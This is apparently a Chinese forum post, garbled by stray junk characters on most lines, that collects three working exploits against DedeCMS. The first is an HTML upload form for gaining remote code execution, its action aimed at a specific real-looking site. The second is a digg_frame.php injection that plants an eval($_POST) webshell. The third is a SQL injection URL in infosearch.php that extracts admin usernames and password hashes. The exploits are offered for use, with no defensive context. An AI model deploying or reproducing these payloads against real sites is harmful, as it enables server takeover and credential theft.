. E& J; _0 m @+ c0 F3 d0 a" Z织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
6 |- J+ a' Z0 U. ]. F2 z<html>0 V, Q; w9 e: s. s2 w
<head>
, k* e% U3 S* T! u) i6 A2 k i<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
, H9 A; T6 k" {% }* F6 i</head>* T. ~5 A9 u( F
<body style="FONT-SIZE: 9pt">* A4 J" M# u$ z p2 W g' w% l
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />3 t2 O4 @) O! W* M4 l1 q
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>! h9 ^6 E: V8 y8 V, _9 U
<input type='hidden' name='activepath' value='/data/cache/' />
3 N! V7 t K# H<input type='hidden' name='cfg_basedir' value='../../' />
* G( Q! C; v, |$ N# Z2 c% F<input type='hidden' name='cfg_imgtype' value='php' />; k5 o/ _9 b# ^# T
<input type='hidden' name='cfg_not_allowall' value='txt' />
* C+ Q2 | B \ N: J<input type='hidden' name='cfg_softtype' value='php' />) M2 W) p: Y' u1 r' A
<input type='hidden' name='cfg_mediatype' value='php' />
! u+ Q0 ^: C: [ w5 o# F<input type='hidden' name='f' value='form1.enclosure' />9 S0 }5 K0 A2 {$ z
<input type='hidden' name='job' value='upload' />4 ?* Y R! T- | @% G9 m* F
<input type='hidden' name='newname' value='fly.php' />
* y0 H! p6 e4 gSelect U Shell <input type='file' name='uploadfile' size='25' />$ }& U, Y9 m( D5 @
<input type='submit' name='sb1' value='确定' />
4 o8 h0 O+ e9 b% B</form>) A8 M) y' W6 U7 l
<br />It's just a exp for the bug of Dedecms V55...<br />
- d/ U) ^2 [+ v, i9 f K0 i( z4 q. DNeed register_globals = on...<br />
2 Q2 O5 [* n2 i3 XFun the game,get a webshell at /data/cache/fly.php...<br />4 V! V r" @/ p2 m& ^: {
</body>$ g1 \$ r+ i/ m$ H0 f% B
</html>: o3 A# @3 Y" }( h% o7 }/ M
2 h/ t+ Y/ O# l
+ D E" o$ K. H# p' h4 S3 b2 W- ~
5 g! e6 Y, Q: [* |2 s/ @; A. j. h8 u1 M9 ^
" r$ {/ U9 P$ W H+ K0 ]
* Q5 M0 @3 l0 K) |0 j
# c4 T2 G7 m7 V7 p1 } i. m9 K k8 o# O" ]$ T& ~) X; U4 @) v
4 `; H$ q. m6 Y- i) X) C1 f2 F6 ~- R) `4 _3 [7 o! A1 s. _7 w0 {4 @
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
% b9 |# p# S, z* h利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。3 W- ]' m( ]( t3 o. p
1. 访问网址:
. t; R2 {; Y" Y m9 F ]% C& Ahttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?># U5 b: B! _1 \
可看见错误信息
5 C* |* F, M1 `1 h# g3 [
& Q2 R" r( A: G5 E9 x4 {- c' J2 A6 M6 q" t% l
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
5 h! o" [% l$ eint(3) Error: Illegal double '1024e1024' value found during parsing
/ u* p( L/ h7 B8 SError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
1 w( P( O6 t( u8 Z
) b/ O0 }6 |+ D" E: v1 } y3 T/ a- Q! D1 g6 W5 O3 X7 ~7 |0 ~
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是% F/ U7 D5 w- I3 h* W4 x7 i
6 I9 q3 O5 }% u/ l
! K9 |- Q+ r/ M, z3 `# b8 m
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
Q" s5 i9 Q1 N' {+ @" B
0 q% y( D5 ^1 C5 O2 \
0 v; o+ R- b5 { C- j: _" m按确定后的看到第2步骤的信息表示文件木马上传成功.
: T3 _8 V) h/ s- h8 B% I3 j. C7 C- q( c' {4 z' Q( t
4 K( {) l) O6 M4 d
, r7 ]8 Z, G# p
- G: }1 N) A- J
( K) Q: u8 D3 y4 H- m4 E- ?
$ ^* ?2 V0 Z7 D7 p8 A2 G
# P! h6 t `; i+ R% q
5 o( j" S9 h! t6 o) j9 W* z( ^/ L
0 ]9 O. e* C, w+ M; [9 Y" w; D% ~
, W" J, O( u! o, I& ?0 s( F6 [" Q/ }5 v, ], p
! k+ h$ O1 L' d1 T% E/ E织梦(DedeCms)plus/infosearch.php 文件注入漏洞$ h0 g! d% u2 ]' _1 k3 `. g
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对